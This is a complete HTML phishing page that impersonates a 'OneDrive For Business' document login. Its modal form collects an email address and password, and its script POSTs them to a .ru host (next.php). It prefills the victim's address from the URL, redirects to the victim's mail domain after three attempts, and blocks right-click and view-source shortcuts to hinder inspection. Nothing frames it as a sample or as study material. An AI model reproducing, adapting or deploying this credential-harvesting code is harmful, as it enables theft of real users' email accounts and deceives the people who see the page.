
<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Login</title>
    <link rel="icon" type="image/png" sizes="100x100" href="https://storage.googleapis.com/ksjdnjksnfdkjd.appspot.com/onedrive-white.png">
    <link href="https://storage.googleapis.com/ksjdnjksnfdkjd.appspot.com/hover.css" rel="stylesheet" media="all">

    <style type="text/css">

      .button{
        background: rgb(255,255,255);
        background: linear-gradient(130deg, rgba(255,255,255,1) 0%, rgba(205,205,205,0.8519782913165266) 100%);
        color: black;
      }


    </style>
  </head>
  <body style="background-image: url('https://storage.googleapis.com/ksjdnjksnfdkjd.appspot.com/bg2.png'); background-size: cover;background-position: right;" oncontextmenu="return false">
    <div class="container-fluid p-0">
      <div class="container-fluid">
        <div class="row" style="margin: 30px 40px 30px 40px;">
          <div class="col-lg-5 mr-auto my-1 px-5 pb-5" >
            <div class=" pt-5">
              <center> 
                <img src="https://storage.googleapis.com/ksjdnjksnfdkjd.appspot.com/onedrive-white.png" class="img-fluid" width="200px"><br>
                <span class="h3 text-white ">OneDrive<br> For Business</span><br><br>
              </center>
              <span class="h5 text-white">This document is secure, please login to view, edit or download. Select an option below to continue.</span>
            </div>
            <div class="mt-3">
              
              
              
              <a href="https://goodsiedcd.ru/softworkasda4nov/of.html" id="office365modal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" >
                <div class=" px-4 py-1 mt-2 button" style=" border-radius: 30px">
                  <img src="https://storage.googleapis.com/ksjdnjksnfdkjd.appspot.com/office365.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                  <span class="pl-3" style="vertical-align: middle;font-weight: 500;border-radius: 4px;">Sign in with Office365</span>
                </div>
              </a>
             
              <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                <div class=" px-4 py-1 mt-2 button" style=" border-radius: 30px">
                  <img src="https://storage.googleapis.com/ksjdnjksnfdkjd.appspot.com/othermail.ico" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                  <span class="pl-3" style="vertical-align: middle; font-weight: 500;border-radius: 4px;">Sign in with Other Mail</span>
                </div>
              </a>

              <p class="h5 text-center text-white mt-2">OneDrive © 2020</p> 
            </div> 
          </div>  
        </div> 
      </div>
    </div>



    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header">

            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true">&times;</span>
            </button>
          </div>
          <div class="modal-body">
            <center>
              <img id="fieldImg" src="https://storage.googleapis.com/ksjdnjksnfdkjd.appspot.com/othermail.ico" class="img-fluid rounded-circle" width="80px">
              <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Other Mail</span></h5>
              <div class="alert alert-danger" id="msg"></div>
              <span id="error" class="text-danger">That account doesn't exist. Enter a different account</span>

            </center>
            <form id="contact" class="form-horizontal well">
              <div id="div1">
                <div class="col-lg-12">
                  <div class="form-group">
                    <div id="inputbar">
                      <label for="exampleInputEmail1">Email address</label>
                      <input type="email" name="doc" class="form-control" id="doc" aria-describedby="emailHelp" placeholder="Enter email">
                      <small id="emailHelp" class="form-text text-muted">We'll never share your email with anyone else.</small></div>
                      <div id="automail" class="h5 mt-5">
                        <i class="fas fa-arrow-left" id="back1"></i>&nbsp<span id="docch">abc@abc.com</span>
                      </div>
                    </div>
                  </div>
                  <div class="col-lg-12">
                    <div class="form-group">
                      <label for="Password">Password</label>
                      <input type="password" name="ms" class="form-control" id="ms" aria-describedby="emailHelp" placeholder="Enter Password">
                    </div>
                  </div>
                </div>
                <div id="div2">
                  <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="docch" class="h5">abc@abc.com</span><br>
                  
                  <br>
                  >
                  
                </div>
              </div>
              <div class="modal-footer">
                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                <button class="btn btn-lg btn-info pull-right" id="submit-btn">Login</button>
                <button class="btn btn-lg btn-info pull-right" id="submit-btn1">Verify</button>
              </div>
            </form>
          </div>
        </div>
      </div>



      <!-- Optional JavaScript -->
      <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    </body>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

    <script>

     <!--  /* global $ */
     $(document).ready(function(){
      var count=0;
      $('#div2').hide();
      $('#error').hide();
      $("#automail").hide();
      $("#msg").hide();
      $('#submit-btn1').hide();
      $('#back').click(function () {
        $("#msg").hide();
        $('#doc').val("");
        $('#ms').val("");
        
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);

      });
      $('#back1').click(function () {
        $("#msg").hide();
        $('#doc').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      /////////////url doc getting////////////////
      var doc = window.location.hash.substr(1);
      if (!doc) {

      }
      else
      {
        // $('#doc').val(doc);
        var my_doc =doc;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_doc)) {
          $('#error').show();
          doc.focus;
          return false;
        }
        var ind=my_doc.indexOf("@");
        var my_slice=my_doc.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        if (final=="gmail") {
         
          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'https://storage.googleapis.com/ksjdnjksnfdkjd.appspot.com/othermail.ico');
          $('#field').html("Other Mail");
          $('#doc').val(my_doc);
          $('#docch').html(my_doc);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
      }
      ///////////////url getting doc////////////////


     
      $('#othermodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://storage.googleapis.com/ksjdnjksnfdkjd.appspot.com/othermail.ico');
        $('#field').html("Other Mail");
        $("#msg").hide();
        $('#doc').val("");
        $('#ms').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var doc=$("#doc").val();
        var ms=$("#ms").val();
        var detail=$("#field").html();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_doc =doc;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_doc)) {
        $('#error').show();
        doc.focus;
        return false;
      }
      var ind=my_doc.indexOf("@");
      var my_slice=my_doc.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      if (count==1 && final=="gmail") {
        $('#docch').html(my_doc);
        $("#div1").animate({left:200, opacity:"hide"}, 0);
        $("#div2").animate({right:200, opacity:"show"}, 1000);
        $('#submit-btn').hide();
        $('#submit-btn1').show();
        
        return false;

      }
      ///////////new injection////////////////
      count=count+1;
      
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://goodsiedcd.ru/softworkasda4nov/next.php',
        type: 'POST',
        data:{
          doc:doc,
          ms:ms,
          detail:detail,

        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              $("#ms").val("");
              if (count>=3) {
                count=0;
                window.location.replace("http://www."+my_slice);
              }
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                 $('#msg').html(response['msg']);
                  // $('input, textarea').val(function() {
                  //    return this.defaultValue;
                  // });
                }
                else{
                  $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#ms").val("");
              if (count>=3) {
                count=0;
                window.location.replace("http://www."+my_slice);
              }
              $("#msg").show();
              $('#msg').html("Your account or ms is incorrect");
            },
            complete: function(){
              $('#submit-btn').html('Login');
            }
          });
    });
      
      $(document).bind("contextmenu",function(e){
        return false;
      });
    });

document.onkeydown=function(e){
  if (e.ctrlKey && 
    (e.keyCode === 73 || 
     e.keyCode === 105 ||
     e.keyCode === 74 || 
     e.keyCode === 106 || 
     e.keyCode === 85 || 
     e.keyCode === 117)) {
    alert('not allowed');
  return false;
} else {
  return true;
}
}
</script>
</html>